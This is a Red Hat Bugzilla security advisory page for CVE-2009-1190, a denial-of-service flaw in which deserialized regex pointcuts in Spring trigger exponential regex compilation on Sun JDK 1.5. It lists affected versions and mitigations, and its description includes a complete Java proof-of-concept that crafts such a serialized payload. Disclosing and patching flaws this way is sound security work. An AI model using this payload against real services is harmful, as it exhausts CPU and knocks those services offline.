Bug 497161 (CVE-2009-1190) - CVE-2009-1190 Spring Framework Remote Denial of Service vulnerability
Summary: CVE-2009-1190 Spring Framework Remote Denial of Service vulnerability
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: CVE-2009-1190
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2009-04-22 15:25 UTC by Marc Schoenefeld
Modified: 2021-02-25 13:12 UTC (History)
4 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2013-05-27 04:16:37 UTC


Attachments (Terms of Use)

Description Marc Schoenefeld 2009-04-22 15:25:05 UTC
CVE-2009-1190: Spring Framework Remote Denial of Service vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was 

implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from
AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long 

regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex 

expressions forever.

Mitigation:
- Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause
- Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause
- Spring Framework 2.5.6.SR2 is available for Enterprise users that includes a workaround to the root cause
- Disable functionality that accepts serializable data from untrusted sources
- dm Server 1.0.3 that includes a workaround to the root cause will be released shortly
- Instrumented Spring Framework 2.5.6.SR2 that includes a workaround to the root cause will be released shortly

Example:
public class DoSSpring {

    static byte[] getSerialized(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.flush();
        oos.close();
        return baos.toByteArray();
    }

    public static void main(String[] a) throws Exception{
        String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" +
                          "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" +
                          "?(W)?(I)?(U)?(a)?$";
        String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern;
        int length = longerPattern.length();
        String fakePattern = longerPattern.replaceAll(".", "A");
        JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
        jrmp.setPattern(fakePattern);
        System.out.println(jrmp);
        byte[] theArray = getSerialized(jrmp);
        int i = 0;
        for (; i< theArray.length;i++) {
            if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {
                break;
            }
        }
        System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
       
        ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
        ObjectInputStream ois = new ObjectInputStream(bis);
        Object o = ois.readObject();  // returns after a very very long time
      
    }
}

Credit: 
This issue was discovered by the RedHat Security Response Team

References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html

Comment 2 Vincent Danen 2009-04-27 22:09:57 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1190 to
the following vulnerability:

Name: CVE-2009-1190
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1190
Assigned: 20090331
Reference: BUGTRAQ:20090424 CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Reference: URL: http://www.securityfocus.com/archive/1/archive/1/502926/100/0/threaded
Reference: MISC: http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
Reference: CONFIRM: http://www.springsource.com/securityadvisory
Reference: CONFIRM: https://bugzilla.redhat.com/show_bug.cgi?id=497161
Reference: SECUNIA:34892
Reference: URL: http://secunia.com/advisories/34892
Reference: XF:springframework-data-dos(50083)
Reference: URL: http://xforce.iss.net/xforce/xfdb/50083

Algorithmic complexity vulnerability in the
java.util.regex.Pattern.compile method in Sun Java Development Kit
(JDK) before 1.6, when used with spring.jar in SpringSource Spring
Framework 1.1.0 through 2.5.6 and 3.0.0.M1 through 3.0.0.M2 and dm
Server 1.0.0 through 1.0.2, allows remote attackers to cause a denial
of service (CPU consumption) via serializable data with a long regex
string containing multiple optional groups, a related issue to
CVE-2004-2540.

Comment 3 David Jorm 2013-05-27 04:16:37 UTC
Statement:

This flaw affected JBoss Enterprise BRMS Platform 5.1.0 when run on Sun JDK 1.5.x. It was resolved in JBoss Enterprise BRMS Platform 5.2.0, both by updating spring and by dropping support for Sun JDK 1.5.x.


Note You need to log in before you can comment on or make changes to this bug.